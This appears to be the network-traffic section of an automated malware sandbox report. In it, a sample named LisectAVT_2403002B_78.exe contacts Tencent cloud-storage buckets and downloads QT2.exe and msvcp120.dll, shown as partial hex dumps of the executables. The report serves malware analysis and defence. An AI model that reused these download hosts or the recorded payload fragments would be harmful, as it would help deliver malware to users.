Jul 25, 2024 11:25:53.376400948 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:53.796091080 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:53.796144009 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:53.796252966 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:53.796571016 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:53.796591997 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:55.308381081 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:55.308515072 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:55.309278011 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:55.309345961 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:55.322448015 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:55.322489977 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:55.322846889 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:55.323201895 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:55.323503017 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:55.368509054 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.124305964 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.124340057 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.124361992 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.124412060 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:56.124443054 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:56.124454021 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.124501944 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:56.203646898 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.203813076 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:56.203843117 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.204039097 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:56.207369089 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.207401037 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.207437992 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:56.207448006 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.207474947 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:56.207479000 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:25:56.207499027 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:56.207529068 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:56.207897902 CEST	49722	443	192.168.2.6	43.153.232.151
Jul 25, 2024 11:25:56.207915068 CEST	443	49722	43.153.232.151	192.168.2.6
Jul 25, 2024 11:26:00.424228907 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:00.424290895 CEST	443	49723	159.75.57.35	192.168.2.6
Jul 25, 2024 11:26:00.424388885 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:00.424693108 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:00.424707890 CEST	443	49723	159.75.57.35	192.168.2.6
Jul 25, 2024 11:26:02.101902008 CEST	443	49723	159.75.57.35	192.168.2.6
Jul 25, 2024 11:26:02.102042913 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:02.102678061 CEST	443	49723	159.75.57.35	192.168.2.6
Jul 25, 2024 11:26:02.102751970 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:02.107192039 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:02.107212067 CEST	443	49723	159.75.57.35	192.168.2.6
Jul 25, 2024 11:26:02.116831064 CEST	443	49723	159.75.57.35	192.168.2.6
Jul 25, 2024 11:26:02.116918087 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:02.117296934 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:02.160501003 CEST	443	49723	159.75.57.35	192.168.2.6
Jul 25, 2024 11:26:02.651242018 CEST	443	49723	159.75.57.35	192.168.2.6
Jul 25, 2024 11:26:02.651386976 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:02.651417971 CEST	443	49723	159.75.57.35	192.168.2.6
Jul 25, 2024 11:26:02.651473999 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:02.651895046 CEST	49723	443	192.168.2.6	159.75.57.35
Jul 25, 2024 11:26:02.651942968 CEST	443	49723	159.75.57.35	192.168.2.6
Jul 25, 2024 11:26:02.652020931 CEST	49723	443	192.168.2.6	159.75.57.35

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 11:25:33.315958023 CEST	50479	53	192.168.2.6	1.1.1.1
Jul 25, 2024 11:25:33.826421022 CEST	53	50479	1.1.1.1	192.168.2.6
Jul 25, 2024 11:25:53.475308895 CEST	64598	53	192.168.2.6	1.1.1.1
Jul 25, 2024 11:25:53.795103073 CEST	53	64598	1.1.1.1	192.168.2.6
Jul 25, 2024 11:25:59.231690884 CEST	64999	53	192.168.2.6	1.1.1.1
Jul 25, 2024 11:26:00.244570017 CEST	64999	53	192.168.2.6	1.1.1.1
Jul 25, 2024 11:26:00.423160076 CEST	53	64999	1.1.1.1	192.168.2.6
Jul 25, 2024 11:26:00.423181057 CEST	53	64999	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 11:25:33.315958023 CEST	192.168.2.6	1.1.1.1	0xed11	Standard query (0)	wwwdll-1323570959.cos.ap-singapore.myqcloud.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:25:53.475308895 CEST	192.168.2.6	1.1.1.1	0x904b	Standard query (0)	www80-1323570959.cos.ap-singapore.myqcloud.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:25:59.231690884 CEST	192.168.2.6	1.1.1.1	0x7465	Standard query (0)	wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:26:00.244570017 CEST	192.168.2.6	1.1.1.1	0x7465	Standard query (0)	wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 11:25:33.826421022 CEST	1.1.1.1	192.168.2.6	0xed11	No error (0)	wwwdll-1323570959.cos.ap-singapore.myqcloud.com	sgp.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 11:25:33.826421022 CEST	1.1.1.1	192.168.2.6	0xed11	No error (0)	sgp.file.myqcloud.com		43.152.64.193	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:25:33.826421022 CEST	1.1.1.1	192.168.2.6	0xed11	No error (0)	sgp.file.myqcloud.com		43.152.64.207	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:25:33.826421022 CEST	1.1.1.1	192.168.2.6	0xed11	No error (0)	sgp.file.myqcloud.com		43.153.232.151	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:25:33.826421022 CEST	1.1.1.1	192.168.2.6	0xed11	No error (0)	sgp.file.myqcloud.com		43.153.232.152	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:25:53.795103073 CEST	1.1.1.1	192.168.2.6	0x904b	No error (0)	www80-1323570959.cos.ap-singapore.myqcloud.com	sgp.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 11:25:53.795103073 CEST	1.1.1.1	192.168.2.6	0x904b	No error (0)	sgp.file.myqcloud.com		43.153.232.151	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:25:53.795103073 CEST	1.1.1.1	192.168.2.6	0x904b	No error (0)	sgp.file.myqcloud.com		43.153.232.152	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:25:53.795103073 CEST	1.1.1.1	192.168.2.6	0x904b	No error (0)	sgp.file.myqcloud.com		43.152.64.193	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:25:53.795103073 CEST	1.1.1.1	192.168.2.6	0x904b	No error (0)	sgp.file.myqcloud.com		43.152.64.207	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:26:00.423160076 CEST	1.1.1.1	192.168.2.6	0x7465	No error (0)	wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com	gz.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 11:26:00.423160076 CEST	1.1.1.1	192.168.2.6	0x7465	No error (0)	gz.file.myqcloud.com		159.75.57.35	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:26:00.423160076 CEST	1.1.1.1	192.168.2.6	0x7465	No error (0)	gz.file.myqcloud.com		159.75.57.69	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:26:00.423160076 CEST	1.1.1.1	192.168.2.6	0x7465	No error (0)	gz.file.myqcloud.com		159.75.57.36	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:26:00.423181057 CEST	1.1.1.1	192.168.2.6	0x7465	No error (0)	wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com	gz.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 11:26:00.423181057 CEST	1.1.1.1	192.168.2.6	0x7465	No error (0)	gz.file.myqcloud.com		159.75.57.35	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:26:00.423181057 CEST	1.1.1.1	192.168.2.6	0x7465	No error (0)	gz.file.myqcloud.com		159.75.57.69	A (IP address)	IN (0x0001)	false
Jul 25, 2024 11:26:00.423181057 CEST	1.1.1.1	192.168.2.6	0x7465	No error (0)	gz.file.myqcloud.com		159.75.57.36	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

wwwdll-1323570959.cos.ap-singapore.myqcloud.com

www80-1323570959.cos.ap-singapore.myqcloud.com

wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	43.152.64.193	443	4800	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 09:25:35 UTC	130	OUT	GET /QT2.exe HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 09:25:36 UTC	473	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 1659120 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 09:25:36 GMT ETag: "5f29a3a467d2b501ffdac96e72665b83" Last-Modified: Mon, 18 Mar 2024 08:55:28 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 8467060223181731739 x-cos-request-id: NjZhMjFhMTBfM2NhZjQ4MGJfMzQ1NGFfNjE3NTNh x-cos-server-side-encryption: AES256
2024-07-25 09:25:36 UTC	7731	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed f1 96 5b a9 90 f8 08 a9 90 f8 08 a9 90 f8 08 37 30 3f 08 ab 90 f8 08 a4 c2 27 08 a3 90 f8 08 a4 c2 18 08 ba 90 f8 08 74 6f 29 08 a8 90 f8 08 a4 c2 25 08 ad 90 f8 08 a4 c2 19 08 ae 90 f8 08 74 6f 36 08 a7 90 f8 08 74 6f 28 08 a8 90 f8 08 74 6f 33 08 8b 90 f8 08 1c 0e 25 08 ac 90 f8 08 a9 90 f9 08 15 92 f8 08 1c 0e 18 08 a8 90 f8 08 1c 0e 19 08 8a 90 f8 08 1c 0e 1d 08 e8 90 f8 Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$[70?'to)%to6to(to3%
2024-07-25 09:25:37 UTC	16368	IN	Data Raw: 68 f4 d3 4f 00 b9 94 de 53 00 c6 45 fc 8a e8 3a f5 08 00 c7 45 e0 00 6b 41 00 c7 45 e4 f0 ff ff ff c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 f3 0f 6f 45 e0 c7 05 18 df 53 00 02 00 00 00 f3 0f 7f 05 20 df 53 00 6a ff 68 e0 8f 4f 00 b9 30 df 53 00 c6 45 fc 8b e8 f2 f4 08 00 6a ff 68 18 d4 4f 00 b9 b4 df 53 00 c6 45 fc 8c e8 dd f4 08 00 c7 45 e0 00 6f 41 00 c7 45 e4 f0 ff ff ff c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 f3 0f 6f 45 e0 c7 05 38 e0 53 00 02 00 00 00 f3 0f 7f 05 40 e0 53 00 6a ff 68 e0 8f 4f 00 b9 50 e0 53 00 c6 45 fc 8d e8 95 f4 08 00 6a ff 68 40 d4 4f 00 b9 d4 e0 53 00 c6 45 fc 8e e8 80 f4 08 00 c7 45 e0 50 6f 41 00 c7 45 e4 f0 ff ff ff c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 f3 0f 6f 45 e0 c7 05 58 e1 53 00 02 00 00 00 f3 0f 7f 05 60 e1 53 Data Ascii: hOSE:EkAEEEoES SjhO0SEjhOSEEoAEEEoE8S@SjhOPSEjh@OSEEPoAEEEoEXS`S
2024-07-25 09:25:37 UTC	8184	IN	Data Raw: 01 33 c9 66 a3 98 c7 52 00 66 39 0d 4c 91 50 00 b8 0d 00 00 00 c7 05 ac c7 52 00 07 00 00 00 0f 44 c1 c7 05 a8 c7 52 00 00 00 00 00 50 68 4c 91 50 00 b9 98 c7 52 00 e8 51 39 00 00 33 c0 c6 45 fc 02 33 c9 66 a3 b0 c7 52 00 66 39 0d 68 91 50 00 b8 09 00 00 00 c7 05 c4 c7 52 00 07 00 00 00 0f 44 c1 c7 05 c0 c7 52 00 00 00 00 00 50 68 68 91 50 00 b9 b0 c7 52 00 e8 10 39 00 00 33 c0 c6 45 fc 03 33 c9 66 a3 c8 c7 52 00 66 39 0d 7c 91 50 00 8b c6 c7 05 dc c7 52 00 07 00 00 00 0f 44 c1 c7 05 d8 c7 52 00 00 00 00 00 50 68 7c 91 50 00 b9 c8 c7 52 00 e8 d2 38 00 00 33 c0 c6 45 fc 04 33 c9 66 a3 e0 c7 52 00 66 39 0d a0 91 50 00 b8 1a 00 00 00 c7 05 f4 c7 52 00 07 00 00 00 0f 44 c1 c7 05 f0 c7 52 00 00 00 00 00 50 68 a0 91 50 00 b9 e0 c7 52 00 e8 91 38 00 00 33 c0 c6 Data Ascii: 3fRf9LPRDRPhLPRQ93E3fRf9hPRDRPhhPR93E3fRf9\|PRDRPh\|PR83E3fRf9PRDRPhPR83
2024-07-25 09:25:37 UTC	8184	IN	Data Raw: 72 02 8b 36 51 56 ff 70 10 51 8b c8 e8 a4 10 00 00 85 c0 74 52 68 b0 86 4f 00 8d 4d bc e8 a3 1a 00 00 8b f0 8d 45 d4 c7 45 fc 05 00 00 00 50 b9 f0 78 53 00 c7 45 f0 0f 00 00 00 e8 65 1b 00 00 c7 45 fc 06 00 00 00 bb 1f 00 00 00 83 7e 14 08 8b 4e 10 89 5d f0 72 02 8b 36 51 56 ff 70 10 51 8b c8 e8 4e 10 00 00 8b 35 70 06 4f 00 f6 c3 10 74 25 83 e3 ef 83 7d e8 08 72 08 ff 75 d4 ff d6 83 c4 04 33 c0 c7 45 e8 07 00 00 00 c7 45 e4 00 00 00 00 66 89 45 d4 f6 c3 08 74 25 83 e3 f7 83 7d d0 08 72 08 ff 75 bc ff d6 83 c4 04 33 c0 c7 45 d0 07 00 00 00 c7 45 cc 00 00 00 00 66 89 45 bc f6 c3 04 74 25 83 e3 fb 83 7d b8 08 72 08 ff 75 a4 ff d6 83 c4 04 33 c0 c7 45 b8 07 00 00 00 c7 45 b4 00 00 00 00 66 89 45 a4 f6 c3 02 74 25 83 e3 fd 83 7d a0 08 72 08 ff 75 8c ff d6 83 Data Ascii: r6QVpQtRhOMEEPxSEeE~N]r6QVpQN5pOt%}ru3EEfEt%}ru3EEfEt%}ru3EEfEt%}ru
2024-07-25 09:25:37 UTC	8184	IN	Data Raw: a3 00 00 00 00 88 55 f3 8b f9 89 7d e8 c7 45 ec 00 00 00 00 c7 45 fc 02 00 00 00 8d 5f 18 33 c0 c7 47 14 07 00 00 00 c7 47 10 00 00 00 00 66 89 07 89 43 10 8d 45 08 c7 45 ec 01 00 00 00 3b f8 74 0a 6a ff 6a 00 50 e8 b1 f5 ff ff 8d 45 20 3b d8 74 3d 8b 4b 10 85 c9 74 15 8b 11 3b cb 0f 95 c0 0f b6 c0 50 ff 52 10 c7 43 10 00 00 00 00 8b 75 30 85 f6 75 05 89 73 10 eb 18 8d 45 20 8b ce 3b f0 8b 06 75 03 53 eb 02 6a 00 ff 10 89 43 10 8b 75 30 83 7d 1c 08 8a 45 f3 88 47 30 72 0f ff 75 08 ff 15 70 06 4f 00 8b 75 30 83 c4 04 33 c0 c7 45 1c 07 00 00 00 c7 45 18 00 00 00 00 66 89 45 08 88 45 fc 85 f6 74 13 8b 16 8d 45 20 3b f0 0f 95 c1 0f b6 c9 51 8b ce ff 52 10 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b Data Ascii: U}EE_3GGfCEE;tjjPE ;t=Kt;PRCu0usE ;uSjCu0}EG0rupOu03EEfEEtE ;QRMdY_^[]U
2024-07-25 09:25:37 UTC	8184	IN	Data Raw: 51 8d 45 fc 50 e8 6b 01 00 00 8b 45 0c 3b 45 10 75 a7 89 06 8b c6 5e 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc cc 55 8b ec 51 56 8b 75 08 8b c1 57 89 45 fc 8b fe 80 7e 0d 00 75 4a 53 8b 1d 70 06 4f 00 8d 49 00 ff 77 08 8b c8 e8 d6 ff ff ff 83 7e 24 08 8b 3f 72 08 ff 76 10 ff d3 83 c4 04 33 c0 c7 46 24 07 00 00 00 c7 46 20 00 00 00 00 56 66 89 46 10 ff d3 8b 45 fc 83 c4 04 80 7f 0d 00 8b f7 74 c1 5b 5f 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 8b 51 08 8b 02 89 41 08 8b 02 80 78 0d 00 75 03 89 48 04 8b 41 04 89 42 04 a1 20 76 53 00 3b 48 04 75 0c 89 50 04 89 0a 89 51 04 5d c2 04 00 8b 41 04 3b 08 75 0b 89 10 89 0a 89 51 04 5d c2 04 00 89 50 08 89 0a 89 51 04 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 8b 11 8b 42 Data Ascii: QEPkE;Eu^]UQVuWE~uJSpOIw~$?rv3F$F VfFEt[_^]UMQAxuHAB vS;HuPQ]A;uQ]PQ]UMB
2024-07-25 09:25:37 UTC	8184	IN	Data Raw: 08 00 8b 8b 5c 05 00 00 8b f0 8b 49 1c 85 c9 74 16 8d 44 24 17 c6 44 24 17 00 50 68 40 fd 4f 00 e8 a8 90 01 00 eb 02 32 c0 8b 16 84 c0 6a 01 0f 94 c0 8b ce 0f b6 c0 50 ff 92 60 01 00 00 68 18 d5 4f 00 8d 4b 2c e8 b2 6a 08 00 0f b6 8b bc 07 00 00 6a 01 51 8b 10 8b c8 ff 92 60 01 00 00 68 98 d8 4f 00 8d 4b 2c e8 91 6a 08 00 6a 00 8b c8 8b 10 ff 92 e0 00 00 00 68 d4 ce 4f 00 8d 4b 2c e8 78 6a 08 00 8b f0 6a 01 8b ce e8 5d 94 09 00 6a 04 8b ce e8 74 93 09 00 8b 16 8b ce 68 c0 d9 4f 00 68 80 90 4f 00 ff 92 2c 01 00 00 8b 06 8b ce 68 cc d9 4f 00 68 dc d9 4f 00 ff 90 2c 01 00 00 68 f4 ce 4f 00 8d 4b 2c e8 2f 6a 08 00 8b f0 6a 01 8b ce e8 14 94 09 00 6a 04 8b ce e8 2b 93 09 00 8b 16 8b ce 68 c0 d9 4f 00 68 80 90 4f 00 ff 92 2c 01 00 00 8b 06 8b ce 68 cc d9 4f 00 Data Ascii: \ItD$D$Ph@O2jP`hOK,jjQ`hOK,jjhOK,xjj]jthOhO,hOhO,hOK,/jjj+hOhO,hO
2024-07-25 09:25:37 UTC	8184	IN	Data Raw: cd 4f 00 8d 4e 2c e8 fa 4a 08 00 8b f8 6a 0c 8b cf e8 bf ae 09 00 56 8d 95 1c fe ff ff 8b cf e8 71 bc 00 00 83 c4 04 c7 45 fc ff ff ff ff 83 bd 1c fe ff ff 00 74 2f 8d 8d 1c fe ff ff ff 15 3c 04 4f 00 ff b5 94 fb ff ff 8b 95 20 fe ff ff 51 8b 8d 1c fe ff ff e8 9a d1 00 00 ff b5 1c fe ff ff ff d3 83 c4 0c 68 1c cd 4f 00 8d 4e 2c e8 92 4a 08 00 8b d8 6a 0c 8b cb 89 9d 9c fb ff ff e8 51 ae 09 00 56 8d 96 90 05 00 00 8b cb e8 33 bd 00 00 8b 8e 94 05 00 00 b8 ab aa aa 2a 2b 8e 90 05 00 00 83 c4 04 8b 1b 8b bd 9c fb ff ff f7 e9 8b cf c1 fa 02 8b c2 c1 e8 1f 03 c2 0f 95 c0 0f b6 c0 50 ff 93 f0 00 00 00 8b cf e8 55 8b 09 00 0d 00 80 00 00 8b cf 50 e8 d8 af 09 00 8b 8e 58 05 00 00 8d 85 20 fe ff ff 50 e8 56 58 01 00 8b 8e 58 05 00 00 e8 1b 57 01 00 8b 9d 24 fe ff Data Ascii: ON,JjVqEt/<O QhON,JjQV3*+PUPX PVXXW$
2024-07-25 09:25:37 UTC	8184	IN	Data Raw: ff ff 8b 8e 58 05 00 00 8d 44 24 14 c7 84 24 28 01 00 00 0e 00 00 00 8b 09 50 68 10 fb 4f 00 e8 a9 33 01 00 c7 84 24 28 01 00 00 ff ff ff ff 83 7c 24 28 08 72 09 ff 74 24 14 ff d7 83 c4 04 8a 86 df 06 00 00 8b 8e 58 05 00 00 88 84 24 e4 00 00 00 8d 84 24 e4 00 00 00 50 68 c0 fc 4f 00 8b 09 e8 17 32 01 00 8a 86 e1 06 00 00 8b 8e 58 05 00 00 88 84 24 e4 00 00 00 8d 84 24 e4 00 00 00 50 68 a0 fc 4f 00 8b 09 e8 f0 31 01 00 8a 86 ea 06 00 00 8b 8e 58 05 00 00 88 84 24 e4 00 00 00 8d 84 24 e4 00 00 00 50 68 20 fc 4f 00 8b 09 e8 c9 31 01 00 8a 86 e0 06 00 00 8b 8e 58 05 00 00 88 84 24 e4 00 00 00 8d 84 24 e4 00 00 00 50 68 80 fc 4f 00 8b 09 e8 a2 31 01 00 33 c0 c7 44 24 28 07 00 00 00 6a ff 50 66 89 44 24 1c 8d 4c 24 1c 8d 86 30 06 00 00 c7 44 24 2c 00 00 00 00 Data Ascii: XD$$(PhO3$(\|$(rt$X$$PhO2X$$PhO1X$$Ph O1X$$PhO13D$(jPfD$L$0D$,
2024-07-25 09:25:37 UTC	8184	IN	Data Raw: d6 e8 bf 06 01 00 8b c8 c6 45 fc 01 83 79 14 08 72 02 8b 09 8b 07 51 8b cf ff 50 3c 83 bd 64 ff ff ff 08 72 0f ff b5 50 ff ff ff ff 15 70 06 4f 00 83 c4 04 33 c0 c7 85 64 ff ff ff 07 00 00 00 8d 8d 68 ff ff ff c7 85 60 ff ff ff 00 00 00 00 66 89 85 50 ff ff ff 89 b3 1c 06 00 00 c7 45 fc ff ff ff ff e8 1c d6 07 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d f0 33 cd e8 1e 89 0c 00 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 66 04 4e 00 64 a1 00 00 00 00 50 81 ec a4 00 00 00 a1 20 c3 52 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b d9 8b 75 08 8d 85 68 ff ff ff 68 84 00 00 00 6a 00 50 e8 8c 90 0c 00 8b 8e 08 01 00 00 8d 95 68 ff ff ff 83 c4 0c 8b 01 52 ff 50 38 8d 45 ec c7 45 fc 00 00 00 00 50 68 14 f6 4f Data Ascii: EyrQP<drPpO3dh`fPEMdY_^[M3]UjhfNdP R3ESVWPEduhhjPhRP8EEPhO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49713	43.152.64.193	443	4800	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 09:25:39 UTC	135	OUT	GET /msvcp120.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 09:25:40 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 455328 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 09:25:40 GMT ETag: "fd5cabbe52272bd76007b68186ebaf00" Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 9055190654433826812 x-cos-request-id: NjZhMjFhMTRfNWFmNGQwYl82NmU3XzVlMTM4MA== x-cos-server-side-encryption: AES256
2024-07-25 09:25:40 UTC	15912	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f ad d2 1d 2b cc bc 4e 2b cc bc 4e 2b cc bc 4e f6 33 77 4e 29 cc bc 4e 2b cc bd 4e f0 cc bc 4e 6d 9d 61 4e 28 cc bc 4e 6d 9d 63 4e 23 cc bc 4e 6d 9d 5d 4e 18 cc bc 4e 6d 9d 5c 4e 65 cc bc 4e 6d 9d 59 4e 2d cc bc 4e 6d 9d 60 4e 2a cc bc 4e 6d 9d 67 4e 2a cc bc 4e 6d 9d 62 4e 2a cc bc 4e 52 69 63 68 2b cc bc 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$o+N+N+N3wN)N+NNmaN(NmcN#Nm]NNm\NeNmYN-Nm`NNmgNNmbN*NRich+N
2024-07-25 09:25:40 UTC	4	IN	Data Raw: 0e 8e 4e ce Data Ascii: N
2024-07-25 09:25:40 UTC	8184	IN	Data Raw: 2e ae 6e ee 1e 9e 5e de 3e be 7e fe 01 81 41 c1 21 a1 61 e1 11 91 51 d1 31 b1 71 f1 09 89 49 c9 29 a9 69 e9 19 99 59 d9 39 b9 79 f9 05 85 45 c5 25 a5 65 e5 15 95 55 d5 35 b5 75 f5 0d 8d 4d cd 2d ad 6d ed 1d 9d 5d dd 3d bd 7d fd 03 83 43 c3 23 a3 63 e3 13 93 53 d3 33 b3 73 f3 0b 8b 4b cb 2b ab 6b eb 1b 9b 5b db 3b bb 7b fb 07 87 47 c7 27 a7 67 e7 17 97 57 d7 37 b7 77 f7 0f 8f 4f cf 2f af 6f ef 1f 9f 5f df 3f bf 7f ff 84 7c 00 10 00 b2 03 10 00 b2 03 10 00 b2 03 10 a1 11 01 10 00 b2 03 10 00 b2 03 10 49 6e 64 65 78 20 6f 75 74 20 6f 66 20 72 61 6e 67 65 00 00 49 6e 64 65 78 20 6f 75 74 20 6f 66 20 73 65 67 6d 65 6e 74 73 20 74 61 62 6c 65 20 72 61 6e 67 65 00 00 00 49 6e 64 65 78 20 69 73 20 69 6e 73 69 64 65 20 73 65 67 6d 65 6e 74 20 77 68 69 63 68 20 66 Data Ascii: .n^>~A!aQ1qI)iY9yE%eU5uM-m]=}C#cS3sK+k[;{G'gW7wO/o_?\|Index out of rangeIndex out of segments table rangeIndex is inside segment which f
